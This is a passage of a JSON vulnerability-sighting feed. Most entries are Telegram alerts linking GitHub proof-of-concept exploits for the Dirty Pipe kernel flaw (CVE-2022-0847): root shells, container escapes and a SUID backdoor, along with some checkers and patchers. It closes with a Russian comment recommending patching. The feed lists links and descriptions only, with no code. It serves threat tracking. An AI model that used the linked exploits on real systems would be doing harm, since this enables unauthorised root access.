well)\nURL\uff1ahttps://github.com/LudovicPatho/CVE-2022-22965_Spring4Shell\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-04-05T21:03:41.000000Z"}, {"uuid": "c6d1e88d-581e-4006-ba18-f2cb5653cd28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1640", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847-DirtyPipe-Exploit\nURL\uff1ahttps://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit", "creation_timestamp": "2022-03-10T13:25:36.000000Z"}, {"uuid": "aeb97c15-2600-4402-b6f2-b0e350d95601", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 POC and Docker and Analysis write up\nURL\uff1ahttps://github.com/chenaotian/CVE-2022-0847", "creation_timestamp": "2022-03-10T01:31:39.000000Z"}, {"uuid": "f12627f4-7406-48f9-bbd1-8a9a10f9bd4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1635", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA root exploit for CVE-2022-0847 (Dirty Pipe)\nURL\uff1ahttps://github.com/babyshen/CVE-2022-0847", "creation_timestamp": "2022-03-10T01:06:05.000000Z"}, {"uuid": "19f3bd9b-189a-4038-801e-c2d445e38e5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1652", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 (Dirty Pipe) is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. /etc/passwd, /etc/shadow.\nURL\uff1ahttps://github.com/sa-infinity8888/Dirty-Pipe-CVE-2022-0847", "creation_timestamp": "2022-03-13T06:12:40.000000Z"}, {"uuid": "6ca70815-7b9b-4171-946f-4a1be6e5890c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1650", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1amy personal exploit of CVE-2022-0847(dirty pipe)\nURL\uff1ahttps://github.com/arttnba3/CVE-2022-0847", "creation_timestamp": "2022-03-12T11:33:31.000000Z"}, {"uuid": "dc2cbe28-40e4-404f-99bf-3e0c8edfe20f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1648", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell\nURL\uff1ahttps://github.com/crusoe112/DirtyPipePython", "creation_timestamp": "2022-03-11T08:24:32.000000Z"}, {"uuid": "20b3a32f-67f3-4b15-97e1-2d520d8705da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1660", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aImplementation of CVE-2022-0847 as a shellcode\nURL\uff1ahttps://github.com/Shotokhan/cve_2022_0847_shellcode", "creation_timestamp": "2022-03-14T22:56:28.000000Z"}, {"uuid": "c838b24d-fb0f-4d8b-a2d8-55293bd07a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1657", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 POC\nURL\uff1ahttps://github.com/breachnix/dirty-pipe-poc", "creation_timestamp": "2022-03-14T15:36:17.000000Z"}, {"uuid": "11569951-158e-408a-91bf-fea2b96a5995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1665", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPython script to check if your kernel is vulnerable to Dirty pipe CVE-2022-0847\nURL\uff1ahttps://github.com/MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker", "creation_timestamp": "2022-03-15T11:27:56.000000Z"}, {"uuid": "0a24d15f-be0b-40af-9220-46f360e5bb2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1754", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExploit for Dirty-Pipe (CVE-2022-0847) \nURL\uff1ahttps://github.com/Nekoox/dirty-pipe\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-03-31T11:51:37.000000Z"}, {"uuid": "5aeab91e-99b3-4204-841f-c86897604c18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/gitrated.bsky.social/post/3mkcobtr4tf2p", "content": "", "creation_timestamp": "2026-04-25T08:56:46.515280Z"}, {"uuid": "25bcbd80-f3d1-41a7-808a-6ad59efe0467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1692", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1apwncat module that automatically exploits CVE-2022-0847 (dirtypipe)\nURL\uff1ahttps://github.com/DanaEpp/pwncat_dirtypipe\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-03-20T23:06:28.000000Z"}, {"uuid": "ef4121d7-6ced-493b-b960-737adf9af49a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1717", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aContainer Excape PoC for CVE-2022-0847 \\\"DirtyPipe\\\"\nURL\uff1ahttps://github.com/DataDog/dirtypipe-container-breakout-poc\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-03-25T15:08:17.000000Z"}, {"uuid": "ec596d30-2873-48ed-bbcb-7d860033da83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2660", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 SUID Shell Backdoor\nURL\uff1ahttps://github.com/notl0cal/dpipe\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-07T14:41:47.000000Z"}, {"uuid": "3164f919-7819-459b-b867-d42b549cb964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2511", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 used to achieve container escape \u5229\u7528CVE-2022-0847 (Dirty Pipe) \u5b9e\u73b0\u5bb9\u5668\u9003\u9038\nURL\uff1ahttps://github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-15T03:39:18.000000Z"}, {"uuid": "cc9f11bf-c5b7-42dc-9752-260e35e9c6bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1964", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aScripted Linux Privilege Escalation for the CVE-2022-0847 \\\"Dirty Pipe\\\" vulnerability\nURL\uff1ahttps://github.com/rexpository/linux-privilege-escalation\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-04-17T05:41:56.000000Z"}, {"uuid": "7c523916-0012-4b60-bdca-67874bb55870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2115", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aFiles required to demonstrate CVE-2022-0847 vulnerability in Linux Kernel v5.8\nURL\uff1ahttps://github.com/isaiahsimeone/COMP3320-VAPT\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-08T20:22:59.000000Z"}, {"uuid": "e657debb-5e89-4d9e-accd-144ec3d255bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2237", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThis repository is developed to analysis and understand DirtyPipe exploit CVE-2022-0847\nURL\uff1ahttps://github.com/VinuKalana/DirtyPipe-CVE-2022-0847\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-19T16:21:56.000000Z"}, {"uuid": "b0629f27-d5b3-4ae9-a195-87e1150282dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2629", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Simple bash script that patches the CVE-2022-0847 (dirty pipe) kernel vulnerability on Debian 11\nURL\uff1ahttps://github.com/ih3na/debian11-dirty_pipe-patcher\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-04T13:26:00.000000Z"}, {"uuid": "1fead85b-5d55-47cd-82d3-1e7f521a6cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2990", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 used to achieve container escape \u5229\u7528CVE-2022-0847 (Dirty Pipe) \u5b9e\u73b0\u5bb9\u5668\u9003\u9038\nURL\uff1ahttps://github.com/yoeelingBin/CVE-2022-0847-Container-Escape\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-08-21T02:33:45.000000Z"}, {"uuid": "290ee5eb-189a-4b90-a3cc-98b89ce8aadd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2644", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aexp of CVE-2022-0847\nURL\uff1ahttps://github.com/edr1412/Dirty-Pipe\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-05T19:26:51.000000Z"}, {"uuid": "a55dcf52-9cbb-499e-80be-37e68e9c9bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3468", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1a\u4fee\u6539\u7248CVE-2022-0847\nURL\uff1ahttps://github.com/qwert419/linux-\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-21T01:27:07.000000Z"}, {"uuid": "ee4eb685-13dd-4ab2-b54b-2758de444a8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/Gc_Yw8Oiyz-_6d-dOk3rOK3I6YYLFFVbWsHnMMvKNFPbpwA", "content": "", "creation_timestamp": "2022-03-12T07:48:10.000000Z"}, {"uuid": "d49c8ea8-34f9-4522-a9de-d26182183b11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/ckuRED/118", "content": "Dirty Pipe (CVE-2022-0847) temporary root PoC for Android.\n\nhttps://github.com/polygraphene/DirtyPipe-Android", "creation_timestamp": "2022-03-25T17:32:11.000000Z"}, {"uuid": "01ba03f0-73fc-4b64-b89d-f976874622e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3464", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aResources required for building Pluralsight CVE-2022-0847 lab\nURL\uff1ahttps://github.com/Turzum/ps-lab-cve-2022-0847\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-19T23:37:26.000000Z"}, {"uuid": "27166bb2-39f2-431c-aa7c-6f564c174a3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3741", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u5229\u7528\n\u63cf\u8ff0\uff1a\u6f0f\u6d1e\u590d\u73b0\u3001\u6f0f\u6d1e\u68c0\u6d4b\u3001\u6f0f\u6d1e\u5229\u7528\nURL\uff1ahttps://github.com/r1is/CVE-2022-0847\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u5229\u7528", "creation_timestamp": "2023-02-02T02:25:01.000000Z"}, {"uuid": "26881113-9cea-4a3c-94fc-62593e2dabee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3593", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDirty Pipe - CVE-2022-0847\nURL\uff1ahttps://github.com/tmoneypenny/CVE-2022-0847\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-19T06:14:30.000000Z"}, {"uuid": "a998cb32-ce84-45ea-b0cb-2f6424b38e33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/avleonovrus/80", "content": "\u0412 \u043f\u043e\u043b\u043a\u0443 Linux \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0445 \u043f\u043e\u0434\u043d\u044f\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e root-\u0430 \u043f\u0440\u0438\u0431\u044b\u043b\u043e. \u0412\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u043c DirtyCred (CVE-2021-4154 - \u0444\u0435\u0432\u0440\u0430\u043b\u044c\u0441\u043a\u0430\u044f, \u0435\u0441\u0442\u044c PoC; CVE-2022-2588 - \u0441\u0432\u0435\u0436\u0430\u044f, \u043f\u043e\u043a\u0430 \u043d\u0435\u0442 PoC-\u0430). 8 \u043b\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043b. \u0418\u043b\u0438 \u0437\u0430\u043c\u0435\u0447\u0430\u043b\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438, \u043d\u043e \u043f\u043e\u043c\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e NVD \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e \u0442\u043e\u0440\u043c\u043e\u0437\u0438\u0442 \u0438 \u0442\u0430\u043c \u043d\u043e\u0432\u043e\u0433\u043e \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u0442, \u043d\u043e \u043e\u043d \u0432\u043e \u0432\u0441\u044e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \n\n\u0421\u0443\u0434\u044f \u043f\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044e \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0434\u0440\u0430, \u043f\u043e\u0445\u043e\u0436\u0430\u044f \u043d\u0430 \u043c\u0430\u0440\u0442\u043e\u0432\u0441\u043a\u0443\u044e Dirty Pipe (CVE-2022-0847), \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u0440\u0443\u0447\u0435, \u0442.\u043a. \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u0435\u0435:\n\n\"The novel exploitation method, according to the researchers, pushes the dirty pipe to the next level, making it more general as well as potent in a manner that could work on any version of the affected kernel.\"\n\n\u0418 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u043d\u0435 \u0441\u043f\u0430\u0441\u0430\u0435\u0442:\n\n\"Second, while it is like the dirty pipe that could bypass all the kernel protections, our exploitation method could even demonstrate the ability to escape the container actively that Dirty Pipe is not capable of.\"\n\n\u041d\u0443 \u0438 \u0442\u0430\u043a-\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432 Linux root-\u0430 \u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e. \u0418\u0437 \u0433\u0440\u043e\u043c\u043a\u0438\u0445 \u043c\u043e\u0436\u043d\u043e \u0435\u0449\u0451 \u0432\u0441\u043f\u043e\u043c\u043d\u0438\u0442\u044c Dirty Cow (CVE-2016-5195 - \u043e\u0431\u0430\u043b\u0434\u0435\u0442\u044c \ud83d\ude31, 6 \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434, \u043f\u043e\u043c\u043d\u044e \u043a\u0430\u043a \u0432\u0447\u0435\u0440\u0430 \u043a\u0430\u043a \u0442\u0435\u0441\u0442\u0438\u043b) \u0438 Qualys-\u043e\u0432\u0441\u043a\u0438\u0435 PwnKit (CVE-2021-4034) \u0438 Sequoia (CVE-2021-33909).\n\n\u0410 \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c? \u0418\u043c\u0445\u043e, \u043f\u0430\u0442\u0447\u0438\u0442\u044c. \u041b\u0443\u0447\u0448\u0435 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u0430 \u043d\u0435 \u0432 \u043f\u043e\u0436\u0430\u0440\u043d\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435. \u041d\u043e \u0435\u0441\u043b\u0438 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0438\u043d\u0433\u0430 Linux-\u043e\u0432 \u043d\u0435\u0442, \u0442\u043e \u043b\u0443\u0447\u0448\u0435 \u0440\u0430\u0437\u043e\u0432\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f, \u043c\u0430\u0445\u0430\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e (\u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0430\u0440\u044b\u043c\u0438 \u0441 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430\u043c\u0438) \u043a\u0430\u043a \u0444\u043b\u0430\u0433\u043e\u043c. \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0434\u0435\u0442 \u0432\u0438\u0434\u043d\u043e \u043a\u0430\u043a\u0438\u0435 \u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435\u043c \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u0430 \u0433\u0434\u0435-\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f \u0435\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u0441 \u043d\u0430\u0441\u043a\u043e\u043a\u0430.\n\n\u041d\u0443 \u0438\u043b\u0438 \u043c\u043e\u0436\u043d\u043e \u043d\u0435 \u043f\u0430\u0442\u0447\u0438\u0442\u044c, \u043e\u0431\u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f \u0442\u0435\u043c, \u0447\u0442\u043e \u043e\u043d\u043e (\u0432\u0440\u043e\u0434\u0435) \u043d\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0431\u0435\u043b\u044c\u043d\u043e, \u0430 \u0433\u0434\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0431\u0435\u043b\u044c\u043d\u043e, \u0442\u043e \u0442\u0430\u043c \u043d\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e \u0438\u043b\u0438 \u0442\u0443\u0434\u0430 \u043d\u0435 \u0434\u043e\u0431\u0435\u0440\u0443\u0442\u0441\u044f. \u0418 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043d\u0435 \u0432\u044b\u0431\u0435\u0440\u0443\u0442\u0441\u044f. \u0418 \u0432\u043e\u043e\u0431\u0449\u0435 \u043c\u043e\u0436\u043d\u043e \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c EDR \u043d\u0430 \u043b\u0438\u043d\u0443\u043a\u0441\u0430\u0445. \u0418 \u0435\u0449\u0451 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043c\u0430\u043d\u0434\u0430\u0442\u043a\u0443 \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c. \n\n\u041d\u043e, \u0438\u043c\u0445\u043e, \u043e\u0446\u0435\u043d\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0431\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438,  \u0445\u0430\u0440\u0434\u0435\u043d\u0438\u043d\u0433 \u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 \u0421\u0417\u0418 \u0434\u043b\u044f Linux-\u043e\u0432 \u044d\u0442\u043e \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0432\u0441\u0435  \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u043d\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u044d\u0442\u043e \u043f\u0430\u0442\u0447\u0438\u043d\u0433 \u0438 \u043f\u0440\u0435\u0436\u0434\u0435 \u0432\u0441\u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0441 \u043d\u0438\u043c. 